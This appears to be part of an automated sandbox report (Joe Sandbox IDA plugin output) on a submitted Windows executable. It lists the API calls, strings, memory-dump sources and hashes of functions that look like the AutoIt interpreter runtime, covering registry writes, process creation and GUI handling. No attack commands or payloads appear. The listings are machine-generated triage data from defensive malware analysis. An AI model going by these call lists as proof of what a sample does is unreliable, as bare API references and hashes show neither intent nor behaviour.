                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0079C5A4
                                                                • _wcslen.LIBCMT ref: 0079C5F4
                                                                • _wcslen.LIBCMT ref: 0079C66F
                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0079C6B2
                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0079C7C1
                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0079C84D
                                                                • RegCloseKey.ADVAPI32(?), ref: 0079C881
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0079C88E
                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0079C960
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                • API String ID: 9721498-966354055
                                                                • Opcode ID: f73f8a343c9b1989c8bdab3afd3655934ec7cb4683a8284edfd5f712dfbc64d4
                                                                • Instruction ID: 6fed43151c1e7ff8b7e2e84299a3485540fc2bc4a2d0e29aa8c2cee2ca46d8cd
                                                                • Opcode Fuzzy Hash: f73f8a343c9b1989c8bdab3afd3655934ec7cb4683a8284edfd5f712dfbc64d4
                                                                • Instruction Fuzzy Hash: F5126835604200DFDB15DF18D895A6AB7E5EF88714F14889CF84A9B3A2DB39FD81CB81
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 007A09C6
                                                                • _wcslen.LIBCMT ref: 007A0A01
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007A0A54
                                                                • _wcslen.LIBCMT ref: 007A0A8A
                                                                • _wcslen.LIBCMT ref: 007A0B06
                                                                • _wcslen.LIBCMT ref: 007A0B81
                                                                  • Part of subcall function 0072F9F2: _wcslen.LIBCMT ref: 0072F9FD
                                                                  • Part of subcall function 00772BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00772BFA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                • API String ID: 1103490817-4258414348
                                                                • Opcode ID: 7c2c45f5a005b4d06800eefe41716ef6ab77a8b477f66cb18c2aec9cf5998212
                                                                • Instruction ID: 22102b2c419446e4d3948f6fe2a1e7885ffef863ef856305f2adeda4cc06149d
                                                                • Opcode Fuzzy Hash: 7c2c45f5a005b4d06800eefe41716ef6ab77a8b477f66cb18c2aec9cf5998212
                                                                • Instruction Fuzzy Hash: 3DE19B72208301DFC714DF28C45096AB7E2BFD9314B148A5DF89A9B3A2D739ED85CB91
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$BuffCharUpper
                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                • API String ID: 1256254125-909552448
                                                                • Opcode ID: 048d6748928f87a8de04e0264cc3e1e36c776c55dbcdc73eec03849d1f5f9155
                                                                • Instruction ID: 62368458ed893a8d339d501f93f39e7cfd5c960ae59f3af31f748630178d38ee
                                                                • Opcode Fuzzy Hash: 048d6748928f87a8de04e0264cc3e1e36c776c55dbcdc73eec03849d1f5f9155
                                                                • Instruction Fuzzy Hash: 8371257260016A8BCF22DE3CED525BE33A1AF61760F544529F856A7285F63CDD80C3A0
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 007A835A
                                                                • _wcslen.LIBCMT ref: 007A836E
                                                                • _wcslen.LIBCMT ref: 007A8391
                                                                • _wcslen.LIBCMT ref: 007A83B4
                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007A83F2
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007A5BF2), ref: 007A844E
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007A8487
                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007A84CA
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007A8501
                                                                • FreeLibrary.KERNEL32(?), ref: 007A850D
                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007A851D
                                                                • DestroyIcon.USER32(?,?,?,?,?,007A5BF2), ref: 007A852C
                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007A8549
                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007A8555
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                • String ID: .dll$.exe$.icl
                                                                • API String ID: 799131459-1154884017
                                                                • Opcode ID: 3c546f22ae403b8729255c5bceaf18d94430bc23034349420aa746d493149c4c
                                                                • Instruction ID: bf52bd6586f31cf91310295902d3f75159927da9ee6e7efa8fe7d0dc06ca1abc
                                                                • Opcode Fuzzy Hash: 3c546f22ae403b8729255c5bceaf18d94430bc23034349420aa746d493149c4c
                                                                • Instruction Fuzzy Hash: 3061C271940215FEEB18DF64CC45BBE77A8BF89721F108609F815D61D1EB7CA990C7A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                • API String ID: 0-1645009161
                                                                • Opcode ID: 779537241ddcdfb072efe08488db3353ebbea5f32e27fddb8d97f88d73ad70e0
                                                                • Instruction ID: f09dcaa43f1ea316fb7c046ec9da676070d14e6097179b7961adf3a857325e1c
                                                                • Opcode Fuzzy Hash: 779537241ddcdfb072efe08488db3353ebbea5f32e27fddb8d97f88d73ad70e0
                                                                • Instruction Fuzzy Hash: 858104B0A40605FBDB25AF64CC56FEE3BB4AF55700F044024F905AA1D2EB7CD985C7A2
                                                                APIs
                                                                • LoadIconW.USER32(00000063), ref: 00775A2E
                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00775A40
                                                                • SetWindowTextW.USER32(?,?), ref: 00775A57
                                                                • GetDlgItem.USER32(?,000003EA), ref: 00775A6C
                                                                • SetWindowTextW.USER32(00000000,?), ref: 00775A72
                                                                • GetDlgItem.USER32(?,000003E9), ref: 00775A82
                                                                • SetWindowTextW.USER32(00000000,?), ref: 00775A88
                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00775AA9
                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00775AC3
                                                                • GetWindowRect.USER32(?,?), ref: 00775ACC
                                                                • _wcslen.LIBCMT ref: 00775B33
                                                                • SetWindowTextW.USER32(?,?), ref: 00775B6F
                                                                • GetDesktopWindow.USER32 ref: 00775B75
                                                                • GetWindowRect.USER32(00000000), ref: 00775B7C
                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00775BD3
                                                                • GetClientRect.USER32(?,?), ref: 00775BE0
                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00775C05
                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00775C2F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                • String ID:
                                                                • API String ID: 895679908-0
                                                                • Opcode ID: 6b1e3756d91422d41eeb58383f73d4eae82763a1a3f3fd97cae9e14b9ead0468
                                                                • Instruction ID: 64f358efd5f5c4895115346bb6da2064ba583947efab3f6fc9e95215ece1deb0
                                                                • Opcode Fuzzy Hash: 6b1e3756d91422d41eeb58383f73d4eae82763a1a3f3fd97cae9e14b9ead0468
                                                                • Instruction Fuzzy Hash: FF717E71900B09EFDF21DFA8CE85A6EBBF5FF48744F108918E146A25A0D7B8E944CB54
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[}
                                                                • API String ID: 176396367-3465173759
                                                                • Opcode ID: 27aa810b7de3fb5dd477533edb78d0a41f9c724d367dd1a9bd59df2230b9f62b
                                                                • Instruction ID: 579df7f60cf39c993509c270a1abbcc8f0516337bc5cfdfcb879e0e638c306fb
                                                                • Opcode Fuzzy Hash: 27aa810b7de3fb5dd477533edb78d0a41f9c724d367dd1a9bd59df2230b9f62b
                                                                • Instruction Fuzzy Hash: 37E1E732A00516EBCF189F78C4556FDBBB0BF44790F54C12AE45AF7241DB38AE85A790
                                                                APIs
                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007300C6
                                                                  • Part of subcall function 007300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(007E070C,00000FA0,E772790F,?,?,?,?,007523B3,000000FF), ref: 0073011C
                                                                  • Part of subcall function 007300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007523B3,000000FF), ref: 00730127
                                                                  • Part of subcall function 007300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007523B3,000000FF), ref: 00730138
                                                                  • Part of subcall function 007300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0073014E
                                                                  • Part of subcall function 007300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0073015C
                                                                  • Part of subcall function 007300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0073016A
                                                                  • Part of subcall function 007300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00730195
                                                                  • Part of subcall function 007300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007301A0
                                                                • ___scrt_fastfail.LIBCMT ref: 007300E7
                                                                  • Part of subcall function 007300A3: __onexit.LIBCMT ref: 007300A9
                                                                Strings
                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00730122
                                                                • kernel32.dll, xrefs: 00730133
                                                                • InitializeConditionVariable, xrefs: 00730148
                                                                • WakeAllConditionVariable, xrefs: 00730162
                                                                • SleepConditionVariableCS, xrefs: 00730154
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                • API String ID: 66158676-1714406822
                                                                • Opcode ID: a66d3b3912eebb0b712965ec9c228ec33c01245181882190efe500a9f5e641e2
                                                                • Instruction ID: 15c34a5f8dd2c40da9e2568fefe82ec49589ed6ea8b58984281bc4a832319f22
                                                                • Opcode Fuzzy Hash: a66d3b3912eebb0b712965ec9c228ec33c01245181882190efe500a9f5e641e2
                                                                • Instruction Fuzzy Hash: E021FCB2B45714BBF7125BB4AC59B6E73A4DB86B51F004135F801A7292DBBC5C008AD4
                                                                APIs
                                                                • CharLowerBuffW.USER32(00000000,00000000,007ACC08), ref: 00784527
                                                                • _wcslen.LIBCMT ref: 0078453B
                                                                • _wcslen.LIBCMT ref: 00784599
                                                                • _wcslen.LIBCMT ref: 007845F4
                                                                • _wcslen.LIBCMT ref: 0078463F
                                                                • _wcslen.LIBCMT ref: 007846A7
                                                                  • Part of subcall function 0072F9F2: _wcslen.LIBCMT ref: 0072F9FD
                                                                • GetDriveTypeW.KERNEL32(?,007D6BF0,00000061), ref: 00784743
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                • API String ID: 2055661098-1000479233
                                                                • Opcode ID: 340314b13e1d177f3c13982e7e8eb0769b10e3d260bda956ed1a6db465827155
                                                                • Instruction ID: 30fe9aef8bba7dc4809cf2f8f6ee5958d5d3e7afa540d71a4f6d41a341d46b65
                                                                • Opcode Fuzzy Hash: 340314b13e1d177f3c13982e7e8eb0769b10e3d260bda956ed1a6db465827155
                                                                • Instruction Fuzzy Hash: 08B116716483039FC710EF28C894A6EB7E5BFA5720F50491DF496C7291E778E984CB52
                                                                APIs
                                                                  • Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2
                                                                • DragQueryPoint.SHELL32(?,?), ref: 007A9147
                                                                  • Part of subcall function 007A7674: ClientToScreen.USER32(?,?), ref: 007A769A
                                                                  • Part of subcall function 007A7674: GetWindowRect.USER32(?,?), ref: 007A7710
                                                                  • Part of subcall function 007A7674: PtInRect.USER32(?,?,007A8B89), ref: 007A7720
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007A91B0
                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007A91BB
                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007A91DE
                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007A9225
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007A923E
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007A9255
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007A9277
                                                                • DragFinish.SHELL32(?), ref: 007A927E
                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007A9371
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#~
                                                                • API String ID: 221274066-3354685542
                                                                • Opcode ID: 59ec96261f62b25a2b9ea8b11ebd37c5143ef63d126919c1ab099f65e285b132
                                                                • Instruction ID: 25f49c682e3a98667729743ea3b7071271ef2e46cf2e57e6bcefaeb058758de6
                                                                • Opcode Fuzzy Hash: 59ec96261f62b25a2b9ea8b11ebd37c5143ef63d126919c1ab099f65e285b132
                                                                • Instruction Fuzzy Hash: D3617C71108301AFC701DF64DC89DAFBBE8EFC9750F404A1EF691921A1DB389A49CB96
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0079B198
                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0079B1B0
                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0079B1D4
                                                                • _wcslen.LIBCMT ref: 0079B200
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079B214
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079B236
                                                                • _wcslen.LIBCMT ref: 0079B332
                                                                  • Part of subcall function 007805A7: GetStdHandle.KERNEL32(000000F6), ref: 007805C6
                                                                • _wcslen.LIBCMT ref: 0079B34B
                                                                • _wcslen.LIBCMT ref: 0079B366
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079B3B6
                                                                • GetLastError.KERNEL32(00000000), ref: 0079B407
                                                                • CloseHandle.KERNEL32(?), ref: 0079B439
                                                                • CloseHandle.KERNEL32(00000000), ref: 0079B44A
                                                                • CloseHandle.KERNEL32(00000000), ref: 0079B45C
                                                                • CloseHandle.KERNEL32(00000000), ref: 0079B46E
                                                                • CloseHandle.KERNEL32(?), ref: 0079B4E3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 2178637699-0
                                                                • Opcode ID: 408f84c72036d128f01e8315527fcdbe5c9db951cd9ec53e402b8ed5761c63a4
                                                                • Instruction ID: 2dd6ef691732084a6b7ab70e7b8270db7d3fba16c75bb02701d5cf3d6a20750d
                                                                • Opcode Fuzzy Hash: 408f84c72036d128f01e8315527fcdbe5c9db951cd9ec53e402b8ed5761c63a4
                                                                • Instruction Fuzzy Hash: C7F1AC31604340DFCB15EF28E995B6EBBE1AF85310F14855DF8898B2A2DB39EC44CB52
                                                                APIs
                                                                • GetMenuItemCount.USER32(007E1990), ref: 00752F8D
                                                                • GetMenuItemCount.USER32(007E1990), ref: 0075303D
                                                                • GetCursorPos.USER32(?), ref: 00753081
                                                                • SetForegroundWindow.USER32(00000000), ref: 0075308A
                                                                • TrackPopupMenuEx.USER32(007E1990,00000000,?,00000000,00000000,00000000), ref: 0075309D
                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007530A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                • String ID: 0
                                                                • API String ID: 36266755-4108050209
                                                                • Opcode ID: 2ec3d10f91c9ac80e5cd65079ed388243793ffd25a938f8ebc4e1aea327711df
                                                                • Instruction ID: 152908fb2f9e8ea74dc9dcf880c94cddecf0e4a42a6b4ca7e8e6825e1f6863aa
                                                                • Opcode Fuzzy Hash: 2ec3d10f91c9ac80e5cd65079ed388243793ffd25a938f8ebc4e1aea327711df
                                                                • Instruction Fuzzy Hash: FA712970644205FEEB219F28DC49FEABF65FF06364F204206F9196A1E1C7F9A954C790
                                                                APIs
                                                                • DestroyWindow.USER32(?,?), ref: 007A6DEB
                                                                  • Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007A6E5F
                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007A6E81
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007A6E94
                                                                • DestroyWindow.USER32(?), ref: 007A6EB5
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00710000,00000000), ref: 007A6EE4
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007A6EFD
                                                                • GetDesktopWindow.USER32 ref: 007A6F16
                                                                • GetWindowRect.USER32(00000000), ref: 007A6F1D
                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007A6F35
                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007A6F4D
                                                                  • Part of subcall function 00729944: GetWindowLongW.USER32(?,000000EB), ref: 00729952
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                • String ID: 0$tooltips_class32
                                                                • API String ID: 2429346358-3619404913
                                                                • Opcode ID: 0d4cec7dea2598c09cce24782bf768c9cd7b1931cc61e8fa2e207144d0a7f859
                                                                • Instruction ID: 61393156d6ad619e0f50f5898277428101b89250b538c1c64a3a092d0b6f8f97
                                                                • Opcode Fuzzy Hash: 0d4cec7dea2598c09cce24782bf768c9cd7b1931cc61e8fa2e207144d0a7f859
